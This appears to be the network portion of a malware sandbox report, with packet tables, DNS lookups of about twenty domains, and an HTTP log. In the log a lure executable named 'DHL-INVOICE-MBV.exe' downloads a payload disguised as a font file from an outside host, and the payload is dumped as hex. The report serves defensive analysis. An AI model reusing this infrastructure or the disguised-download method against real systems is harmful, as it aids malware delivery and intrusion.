Oct 26, 2022 13:21:49.111057043 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.111171961 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:49.111190081 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.111265898 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.111323118 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.111339092 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:49.111377001 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.111430883 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.111514091 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:49.111643076 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.111680031 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:49.111717939 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.111793995 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.111843109 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:49.112062931 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.112364054 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.112457037 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.307437897 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.307657957 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.308017969 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.308286905 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.308558941 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.308655977 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.308793068 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.308907032 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:49.309108973 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:49.723354101 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:50.738944054 CEST	49963	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:50.931518078 CEST	80	49963	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:50.931876898 CEST	49963	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:50.931993008 CEST	49963	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:51.124625921 CEST	80	49963	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:51.146051884 CEST	80	49963	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:51.191737890 CEST	49963	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:22:01.155220032 CEST	80	49963	162.214.80.106	192.168.11.20
Oct 26, 2022 13:22:01.155425072 CEST	49963	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:22:01.155502081 CEST	49963	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:22:01.347589970 CEST	80	49963	162.214.80.106	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2022 13:14:19.255568981 CEST	58529	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:14:19.434925079 CEST	53	58529	1.1.1.1	192.168.11.20
Oct 26, 2022 13:15:27.638674974 CEST	60373	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:15:28.162652969 CEST	53	60373	1.1.1.1	192.168.11.20
Oct 26, 2022 13:15:38.243304014 CEST	51818	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:15:38.321512938 CEST	53	51818	1.1.1.1	192.168.11.20
Oct 26, 2022 13:15:49.537808895 CEST	60769	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:15:49.960491896 CEST	53	60769	1.1.1.1	192.168.11.20
Oct 26, 2022 13:16:12.032979965 CEST	49460	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:16:12.063431978 CEST	53	49460	1.1.1.1	192.168.11.20
Oct 26, 2022 13:16:24.045434952 CEST	56153	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:16:24.431246996 CEST	53	56153	1.1.1.1	192.168.11.20
Oct 26, 2022 13:16:36.292815924 CEST	52041	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:16:36.643655062 CEST	53	52041	1.1.1.1	192.168.11.20
Oct 26, 2022 13:16:50.883244991 CEST	64931	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:16:50.945154905 CEST	53	64931	1.1.1.1	192.168.11.20
Oct 26, 2022 13:17:03.552544117 CEST	61669	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:17:03.587563992 CEST	53	61669	1.1.1.1	192.168.11.20
Oct 26, 2022 13:17:15.175287008 CEST	51518	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:17:15.194127083 CEST	53	51518	1.1.1.1	192.168.11.20
Oct 26, 2022 13:17:26.328342915 CEST	50311	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:17:26.370160103 CEST	53	50311	1.1.1.1	192.168.11.20
Oct 26, 2022 13:17:37.513976097 CEST	61793	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:17:37.533478022 CEST	53	61793	1.1.1.1	192.168.11.20
Oct 26, 2022 13:17:48.948409081 CEST	54933	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:17:49.152164936 CEST	53	54933	1.1.1.1	192.168.11.20
Oct 26, 2022 13:18:00.836885929 CEST	54790	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:18:01.166419029 CEST	53	54790	1.1.1.1	192.168.11.20
Oct 26, 2022 13:18:13.162199974 CEST	58828	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:18:13.381848097 CEST	53	58828	1.1.1.1	192.168.11.20
Oct 26, 2022 13:18:24.988615036 CEST	65232	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:18:25.536427975 CEST	53	65232	1.1.1.1	192.168.11.20
Oct 26, 2022 13:18:38.281393051 CEST	57018	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:18:38.800991058 CEST	53	57018	1.1.1.1	192.168.11.20
Oct 26, 2022 13:20:57.883426905 CEST	50459	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:20:57.901921988 CEST	53	50459	1.1.1.1	192.168.11.20
Oct 26, 2022 13:21:09.030133963 CEST	61246	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:21:09.219202995 CEST	53	61246	1.1.1.1	192.168.11.20
Oct 26, 2022 13:21:32.930638075 CEST	63122	53	192.168.11.20	1.1.1.1
Oct 26, 2022 13:21:32.947983027 CEST	53	63122	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 26, 2022 13:14:19.255568981 CEST	192.168.11.20	1.1.1.1	0x31a3	Standard query (0)	www.cccre8ive.com	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:15:27.638674974 CEST	192.168.11.20	1.1.1.1	0x7c4	Standard query (0)	www.salemsilverpalace.com	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:15:38.243304014 CEST	192.168.11.20	1.1.1.1	0xd98b	Standard query (0)	www.mnrinstitutes.com	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:15:49.537808895 CEST	192.168.11.20	1.1.1.1	0x17b6	Standard query (0)	www.creotopi.biz	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:16:12.032979965 CEST	192.168.11.20	1.1.1.1	0x43c7	Standard query (0)	www.yumfechy.online	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:16:24.045434952 CEST	192.168.11.20	1.1.1.1	0xc576	Standard query (0)	www.sbgfoundation.net	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:16:36.292815924 CEST	192.168.11.20	1.1.1.1	0x4a43	Standard query (0)	www.budgaugh.com	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:16:50.883244991 CEST	192.168.11.20	1.1.1.1	0x8f0f	Standard query (0)	www.bondiev.com	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:17:03.552544117 CEST	192.168.11.20	1.1.1.1	0xb152	Standard query (0)	www.rahaingoadvice.com	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:17:15.175287008 CEST	192.168.11.20	1.1.1.1	0x2900	Standard query (0)	www.altruista.one	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:17:26.328342915 CEST	192.168.11.20	1.1.1.1	0xf406	Standard query (0)	www.guvnorsnyc.com	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:17:37.513976097 CEST	192.168.11.20	1.1.1.1	0x1016	Standard query (0)	www.pnpg.hair	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:17:48.948409081 CEST	192.168.11.20	1.1.1.1	0xd038	Standard query (0)	www.migrationtask.com	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:18:00.836885929 CEST	192.168.11.20	1.1.1.1	0x2ee8	Standard query (0)	www.driftreiki.com	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:18:13.162199974 CEST	192.168.11.20	1.1.1.1	0xdbc5	Standard query (0)	www.motorizedchess.com	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:18:24.988615036 CEST	192.168.11.20	1.1.1.1	0x2b96	Standard query (0)	www.donglinwangluo.site	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:18:38.281393051 CEST	192.168.11.20	1.1.1.1	0x3752	Standard query (0)	www.7o0i.com	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:20:57.883426905 CEST	192.168.11.20	1.1.1.1	0x939c	Standard query (0)	www.christophersubala.online	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:21:09.030133963 CEST	192.168.11.20	1.1.1.1	0x6c75	Standard query (0)	www.legaldanaa.com	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:21:32.930638075 CEST	192.168.11.20	1.1.1.1	0x379c	Standard query (0)	www.clickthelink.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 26, 2022 13:14:19.434925079 CEST	1.1.1.1	192.168.11.20	0x31a3	No error (0)	www.cccre8ive.com	cccre8ive.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 26, 2022 13:14:19.434925079 CEST	1.1.1.1	192.168.11.20	0x31a3	No error (0)	cccre8ive.com		202.5.16.67	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:15:28.162652969 CEST	1.1.1.1	192.168.11.20	0x7c4	No error (0)	www.salemsilverpalace.com	salemsilverpalace.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 26, 2022 13:15:28.162652969 CEST	1.1.1.1	192.168.11.20	0x7c4	No error (0)	salemsilverpalace.com		2.57.90.16	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:15:38.321512938 CEST	1.1.1.1	192.168.11.20	0xd98b	No error (0)	www.mnrinstitutes.com	mnrinstitutes.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 26, 2022 13:15:38.321512938 CEST	1.1.1.1	192.168.11.20	0xd98b	No error (0)	mnrinstitutes.com		2.57.90.16	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:15:49.960491896 CEST	1.1.1.1	192.168.11.20	0x17b6	No error (0)	www.creotopi.biz	creotopi.biz		CNAME (Canonical name)	IN (0x0001)	false
Oct 26, 2022 13:15:49.960491896 CEST	1.1.1.1	192.168.11.20	0x17b6	No error (0)	creotopi.biz		162.214.80.106	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:16:12.063431978 CEST	1.1.1.1	192.168.11.20	0x43c7	No error (0)	www.yumfechy.online		162.0.238.95	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:16:24.431246996 CEST	1.1.1.1	192.168.11.20	0xc576	No error (0)	www.sbgfoundation.net	sbgfoundation.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 26, 2022 13:16:24.431246996 CEST	1.1.1.1	192.168.11.20	0xc576	No error (0)	sbgfoundation.net		162.241.217.234	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:16:36.643655062 CEST	1.1.1.1	192.168.11.20	0x4a43	No error (0)	www.budgaugh.com		104.140.149.212	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:16:50.945154905 CEST	1.1.1.1	192.168.11.20	0x8f0f	No error (0)	www.bondiev.com	bondiev.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 26, 2022 13:16:50.945154905 CEST	1.1.1.1	192.168.11.20	0x8f0f	No error (0)	bondiev.com		103.20.200.97	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:17:03.587563992 CEST	1.1.1.1	192.168.11.20	0xb152	No error (0)	www.rahaingoadvice.com		51.91.236.193	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:17:15.194127083 CEST	1.1.1.1	192.168.11.20	0x2900	No error (0)	www.altruista.one		89.31.143.1	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:17:26.370160103 CEST	1.1.1.1	192.168.11.20	0xf406	No error (0)	www.guvnorsnyc.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:17:37.533478022 CEST	1.1.1.1	192.168.11.20	0x1016	No error (0)	www.pnpg.hair		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:17:37.533478022 CEST	1.1.1.1	192.168.11.20	0x1016	No error (0)	www.pnpg.hair		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:17:49.152164936 CEST	1.1.1.1	192.168.11.20	0xd038	No error (0)	www.migrationtask.com		74.208.236.144	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:18:01.166419029 CEST	1.1.1.1	192.168.11.20	0x2ee8	No error (0)	www.driftreiki.com		207.60.131.46	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:18:13.381848097 CEST	1.1.1.1	192.168.11.20	0xdbc5	No error (0)	www.motorizedchess.com		216.40.34.41	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:18:25.536427975 CEST	1.1.1.1	192.168.11.20	0x2b96	No error (0)	www.donglinwangluo.site		154.221.20.121	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:18:38.800991058 CEST	1.1.1.1	192.168.11.20	0x3752	No error (0)	www.7o0i.com		64.64.242.59	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:20:57.901921988 CEST	1.1.1.1	192.168.11.20	0x939c	No error (0)	www.christophersubala.online	christophersubala.online		CNAME (Canonical name)	IN (0x0001)	false
Oct 26, 2022 13:20:57.901921988 CEST	1.1.1.1	192.168.11.20	0x939c	No error (0)	christophersubala.online		76.223.105.230	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:20:57.901921988 CEST	1.1.1.1	192.168.11.20	0x939c	No error (0)	christophersubala.online		13.248.243.5	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:21:09.219202995 CEST	1.1.1.1	192.168.11.20	0x6c75	No error (0)	www.legaldanaa.com	legaldanaa.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 26, 2022 13:21:09.219202995 CEST	1.1.1.1	192.168.11.20	0x6c75	No error (0)	legaldanaa.com		198.252.105.91	A (IP address)	IN (0x0001)	false
Oct 26, 2022 13:21:32.947983027 CEST	1.1.1.1	192.168.11.20	0x379c	No error (0)	www.clickthelink.xyz		3.64.163.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.cccre8ive.com

www.salemsilverpalace.com

www.mnrinstitutes.com

www.creotopi.biz

www.yumfechy.online

www.sbgfoundation.net

www.budgaugh.com

www.bondiev.com

www.rahaingoadvice.com

www.altruista.one

www.guvnorsnyc.com

www.pnpg.hair

www.migrationtask.com

www.driftreiki.com

www.motorizedchess.com

www.donglinwangluo.site

www.7o0i.com

www.christophersubala.online

www.legaldanaa.com

www.clickthelink.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49834	202.5.16.67	80	C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:14:19.594552040 CEST	124	OUT	GET /vSvUluerSYkJZ205.pfm HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: www.cccre8ive.com Cache-Control: no-cache
Oct 26, 2022 13:14:19.742778063 CEST	126	IN	HTTP/1.1 200 OK Date: Wed, 26 Oct 2022 11:14:19 GMT Server: Apache Last-Modified: Tue, 25 Oct 2022 22:28:40 GMT Accept-Ranges: bytes Content-Length: 189504 Content-Type: application/x-font-type1 Data Raw: bc 2c 8f 69 69 eb b9 32 59 e1 a7 75 af 86 c5 09 82 7e 59 31 4a 7a 5d aa 23 bc 05 7b 3e 42 4d cf a6 3b ca 75 b9 1e 36 c6 cc a2 6b 85 c0 d8 d7 88 5a e7 bc a2 66 e0 82 b6 21 8b 7c 03 6c a9 dd 82 04 1d 85 4d e8 82 4f 77 9c 2c ac 19 7a c9 ab d0 af 30 58 84 7f cd 1c f2 67 95 53 27 4c a1 08 6f c3 2d 90 6b a8 e8 e8 21 30 c1 e5 cd d4 24 9a 3f 89 37 a0 97 fd 9a c1 f0 54 2e fd 2d 5b 82 7a fd 93 8a f3 59 5e 5d b2 82 90 8e 89 29 3b ac 40 a6 be 3b 21 4a ff eb 8c 96 fa 2f 80 b7 8d 2a ba 65 45 ba 9b f5 09 af 52 db 40 c3 ac 74 59 db 4a 92 da 1e b1 d6 37 35 27 b6 55 68 03 9d ea 0b 20 4b 30 5d e9 35 b7 52 b4 56 4d ef f3 86 13 3f 1f f8 d0 f6 69 e8 b0 c7 fa eb 05 3c c1 0e b7 b7 81 22 71 26 9a 01 20 aa a3 f5 74 5e eb 4d ac ea 71 7e 46 38 85 cf b4 9a e7 9b 39 7e 5a bc f9 bd c9 f0 32 5a 8f 38 12 c7 91 e7 25 09 00 7f 16 ac 8b 2d fe 90 c8 a3 f9 c1 a8 90 75 eb 82 5a 8f b6 32 6d 9c bb 91 9c 33 a9 16 a3 e9 a6 4b 0b ea c6 83 68 57 87 47 31 5b 0a f6 47 05 5d ff fd d8 3d 1c 34 d7 d1 5a 64 ab cb af be 0f 06 10 64 a0 e9 85 9d 49 9c 24 4e db 00 7b d6 ea be ed cc 72 9a 54 20 5f d6 58 bf 0f 9c 26 ca 05 9f b6 fb e9 0a e3 d6 6f 41 81 7c ed cc 59 b4 10 d6 a9 3d 51 87 d5 9a 61 a4 e9 b8 54 90 0f 02 94 78 12 1c 41 2d f9 fa 9e 55 fb d8 94 7f c8 9b 89 e4 94 d7 3c 83 0a cd 4b db 24 b2 b7 ea 23 86 30 19 40 b9 81 a5 04 23 de 60 e9 ac e2 f7 d9 ad c5 39 0b 34 58 66 24 ee 39 79 5c 43 08 9c 5b be cb 3a 65 fd 77 73 08 e1 05 f7 98 99 79 e3 33 7f e0 d1 0e 17 e8 fe e5 f6 50 fc f3 18 a1 38 8a 34 6d 40 e0 2f e1 e6 9f 86 27 86 c7 30 fc e0 d8 36 a6 48 11 9a 27 73 9e 9a d5 79 14 df 05 79 3a 4e de 4e 52 c6 1e 50 8e 07 89 06 60 47 3d 29 84 d6 7c b2 53 e0 29 ee ed 4f 90 62 53 a7 1b 42 8c fa 2c a6 70 9e 26 96 d7 03 33 57 cc c5 d4 95 d0 ab 8e 51 dd 4a 2b 77 f2 dd 78 ee b0 ce 7d cf 6c d7 f5 55 fa 1c 35 b0 33 37 32 fd 7e c2 c4 a2 d7 3a b3 74 a8 eb 82 07 99 54 da a0 c1 12 75 1f de 94 f9 09 57 71 42 e8 cc 14 95 02 b9 40 5a 23 92 e1 6e 4d d0 70 57 24 da 2f e8 23 07 a6 23 02 da 4f 82 2c 52 64 d3 bd 2c e7 82 ed 2c b8 ca 38 41 98 ef e9 68 24 43 49 45 33 44 fc 3f 12 d1 23 02 6f ed a5 a5 23 b7 04 2c 58 3e 6e 85 d8 4f a7 97 69 de bb 7c 9a 10 1a 47 14 94 8a de 9b a5 c7 63 63 22 13 1f b0 22 30 80 ea ef 1a fa a4 7b fa 8f 28 98 a8 43 be c6 33 9a 1e 04 aa c6 e4 84 b6 b3 3c e4 a1 cf 90 c6 15 6a 35 1f 6b 04 d2 1a 76 e6 0d 5d d9 81 8f 6b b8 d2 d9 9b 4d 76 f8 40 fd 19 3e 5b 1c 83 bb 9a bb b4 e0 7e 40 60 04 c9 f3 3a e2 1f 68 3a 8e 81 2b 7b 04 ec 23 58 f8 9e 4b 88 a4 7e ac 48 a2 64 39 6e c4 2e 77 b6 65 58 e8 7d 15 1c 6a 30 19 b9 95 b2 c3 98 d5 06 66 c1 c1 6a 99 25 b3 b1 03 0e 3b bc f2 3c c0 92 7a 4f 18 88 19 de 6b 41 c0 bc f1 f5 8a 3a 0c 9a e6 74 27 73 25 3e 39 cf 11 f2 fb 62 96 6c cf db 3e d3 21 50 16 6b 6b 90 89 b2 c5 fa ba ab 60 a8 7c 43 1a 88 ea 36 a8 1a 77 ad 32 9d d1 9d 32 96 95 02 8e cf ef a2 15 50 ab bd f5 f7 10 6c c0 89 b6 55 bf 98 67 a7 a4 a2 89 59 d3 52 49 47 c0 1f 00 82 4f 77 9c 74 2f f1 73 42 63 53 6f 0c d3 84 7c 0c 9f 32 4f 96 5b d8 ad 31 08 6f c3 2d 90 6b a8 e8 e8 21 30 c1 e5 cd d4 24 9a 3f 89 37 a0 97 fd 9a c1 f0 54 2e fd 2d 9b 82 7a fd 9d 95 49 57 5e e9 bb 4f b1 36 88 65 f6 8d 14 ce d7 48 01 3a 8d 84 eb e4 9b 42 a0 d4 ec 44 d4 0a 31 9a f9 90 29 dd 27 b5 60 aa c2 54 1d 94 19 b2 b7 71 d5 b3 19 38 2a bc 71 68 03 9d ea 0b 20 4b 81 41 85 f4 42 2f b6 c4 b8 92 f1 Data Ascii: ,ii2Yu~Y1Jz]#{>BM;u6kZf!\|lMOw,z0XgS'Lo-k!0$?7T.-[zY^]);@;!J/eER@tYJ75'Uh K0]5RVM?i<"q& t^Mq~F89~Z2Z8%-uZ2m3KhWG1[G]=4ZddI$N{rT _X&oA\|Y=QaTxA-U<K$#0@#`94Xf$9y\C[:ewsy3P84m@/'06H'syy:NNRP`G=)\|S)ObSB,p&3WQJ+wx}lU5372~:tTuWqB@Z#nMpW$/##O,Rd,,8Ah$CIE3D?#o#,X>nOi\|Gcc""0{(C3<j5kv]kMv@>[~@`:h:+{#XK~Hd9n.weX}j0fj%;<zOkA:t's%>9bl>!Pkk`\|C6w22PlUgYRIGOwt/sBcSo\|2O[1o-k!0$?7T.-zIW^O6eH:BD1)'`Tq8qh KAB/
Oct 26, 2022 13:14:19.742844105 CEST	127	IN	Data Raw: 14 e6 42 1d 6a 02 4d a4 7a 46 ba f8 79 d7 87 0e 9c 43 ca 83 b0 a3 9d 54 93 d4 d7 a1 67 26 37 88 25 59 97 73 ec 46 38 85 cf b4 9a e7 9b 39 7e 5a bc f9 bd c9 f0 62 1f 8f 38 5e c6 90 e7 4a f9 77 30 16 ac 8b 2d fe 90 c8 a3 19 c1 aa 91 7e ea 89 5a 8f Data Ascii: BjMzFyCTg&7%YsF89~Zb8^Jw0-~Zd0m3YKhWwE1[GM?4ZddIl&N{p_H&oA\|Y=QaTxA-U<K$#0@#`94Xf
Oct 26, 2022 13:14:19.742909908 CEST	128	IN	Data Raw: c1 12 75 1f de 94 f9 09 57 71 42 e8 cc 14 95 02 b9 40 5a 23 92 e1 6e 4d d0 70 57 24 da 2f e8 23 07 a6 23 02 da 4f 82 2c 52 64 d3 bd 2c e7 82 ed 2c b8 ca 38 41 98 ef e9 68 24 43 49 45 33 44 fc 3f 12 d1 23 02 6f ed a5 a5 23 b7 04 2c 58 3e 6e 85 d8 Data Ascii: uWqB@Z#nMpW$/##O,Rd,,8Ah$CIE3D?#o#,X>nOi\|Gcc""0{(C3<j5kv]kMv@>[~@`:h:+{#XK~Hd9n.weX}j0fj%;<zO
Oct 26, 2022 13:14:19.742969990 CEST	130	IN	Data Raw: 88 65 f6 8d 14 ce d7 48 01 3a 8d 84 eb e4 9b 42 a0 d4 ec 44 d4 0a 31 9a f9 90 29 dd 27 b5 60 aa c2 54 1d 94 19 b2 b7 71 d5 b3 19 38 2a bc 71 68 03 9d ea 0b 20 4b 81 41 85 f4 42 2f b6 c4 b8 92 f1 14 e6 42 1d 6a 02 4d a4 7a 46 ba f8 79 d7 87 0e 9c Data Ascii: eH:BD1)'`Tq8*qh KAB/BjMzFyCTg&7%YsF89~Zb8^Jw0-~Zd0m3YKhWwE1[GM?4ZddIl&N{p_H&oA\|Y=Q
Oct 26, 2022 13:14:19.743030071 CEST	131	IN	Data Raw: b0 73 54 e8 4d f2 bf 9c c0 7f 48 63 06 d8 54 f3 e7 bd 4d 91 0d b6 a4 f1 14 1d 2c 24 a1 b7 0d bf ab 50 06 ba 8d 19 5c b0 b5 9c 13 e3 f5 c7 02 53 af d3 c0 03 e7 33 a1 c5 ad 15 18 8d 79 dc b4 bc af 17 57 b5 9e ab 50 98 5b fa 73 cb ad 0c 99 d0 c2 e9 Data Ascii: sTMHcTM,$P\S3yWP[s-[=WnG6.UiPnEG10^@\|!!nO`\|@tku!cV"E\|=wCv2\]xv;PG-P3{+
Oct 26, 2022 13:14:19.743093967 CEST	132	IN	Data Raw: 7d 8c d0 b1 ac f9 c6 38 a6 5e b9 be 15 e1 b9 55 75 fe e6 ac 53 03 22 2c fb 69 32 e9 e4 06 7c 88 20 3d 00 08 0d 4c 52 b1 cb 47 8b 31 3f d7 10 81 a7 5b 61 5c 95 a6 26 2b 73 9a 05 2f 7d 50 c6 1d 8d 44 1a a5 d0 e4 9a 11 b1 3e a8 0a 71 95 a6 16 d8 5f Data Ascii: }8^UuS",i2\| =LRG1?[a\&+s/}PD>q_#!JedKJvBzi^L[?RLibXNP'/MBKOq0G&`2#OVREjj-Mw\|J<]R?JuL$cD)NGoj wycj)<Du-
Oct 26, 2022 13:14:19.743155003 CEST	134	IN	Data Raw: 89 a8 fc 90 4f ac 3b e7 e4 60 61 41 9b 3e c2 ac a0 84 a8 d0 11 54 c2 23 80 34 80 f8 2f 47 c7 80 c9 08 37 1f 55 09 25 3c e2 d7 c6 1a 98 ef 40 ff 64 1d 37 4d 85 5a d7 96 14 42 7a 04 8f 1a 12 1c 31 e0 4e 02 4a d4 a9 c0 35 51 39 8c 04 ad b7 90 1b 2f Data Ascii: O;`aA>T#4/G7U%<@d7MZBz1NJ5Q9/in?0 Ua#"Q&ml;14Jt"sT8K7DX:1]$L(Y7gK,%~{`^-Zv+Z~`mi&jDw<3hxPF
Oct 26, 2022 13:14:19.743217945 CEST	135	IN	Data Raw: 55 a8 a5 8c 5d 2b 2a 5e e8 d7 1d 87 96 2b b5 7e d8 9f a7 fd 30 12 ac 22 ec 07 44 f9 b6 8e d6 67 97 b2 fb 4b c4 2c f0 39 4f 07 c2 fd 5f 5e 4b 8b 26 4b a2 5c 81 df 28 79 a8 24 66 ed 8b d5 b3 93 7d 5f 4d bd 55 8c cd 0a 71 29 fc c7 0c b7 44 6f b9 5f Data Ascii: U]+*^+~0"DgK,9O_^K&K\(y$f}_MUq)Do_9pH~%Xi/QZ-SZOrnS>'VlJ{Fqz!n]hAR~4GeJi&\5)OGHj6N=,pbF4 0]O
Oct 26, 2022 13:14:19.743278027 CEST	137	IN	Data Raw: 29 89 5a 6f 91 25 1d 44 4d 6b a9 ec 24 4f 84 7e 3d b7 88 aa 83 8b 6b c9 e8 88 6a 2d b9 04 1b 5e 85 67 4e 96 56 b3 cf f7 1c 5a 13 39 54 fe 8a 16 1a 43 d6 95 62 17 35 2d 9d 99 78 cf da 6f ab 0a 01 ca 55 3a 8e df ed 27 a9 07 2a 18 84 b6 6a cb b7 ec Data Ascii: )Zo%DMk$O~=kj-^gNVZ9TCb5-xoU:'j)" p\|+(1}>?[EB\i[ }S\|Im4L-8.lVLs[\Y(&@?_1ub&yM0$M?=2\ea^}3m5!
Oct 26, 2022 13:14:19.743340969 CEST	138	IN	Data Raw: 3b 47 ff 44 08 2a 29 21 1f 24 67 79 ce 0c f0 d1 1d da b4 54 0e 7e ca c4 be a3 7c f9 c1 a3 95 d9 0a 2e aa a0 06 b3 31 ed 6e 8d 9a c2 ae 6c 83 a2 0d 83 ed 09 55 d1 4f dc 11 aa 2a 0b 37 24 1c 37 a3 99 7f 88 27 ea b9 b8 a3 85 a5 62 0f a9 30 47 5c 75 Data Ascii: ;GD)!$gyT~\|.1nlUO7$7'b0G\u mD.43NprXTho=aZ1x[IO6F+cO]l~WWYY'>.#(,e~hG0-wfR>CAj/P
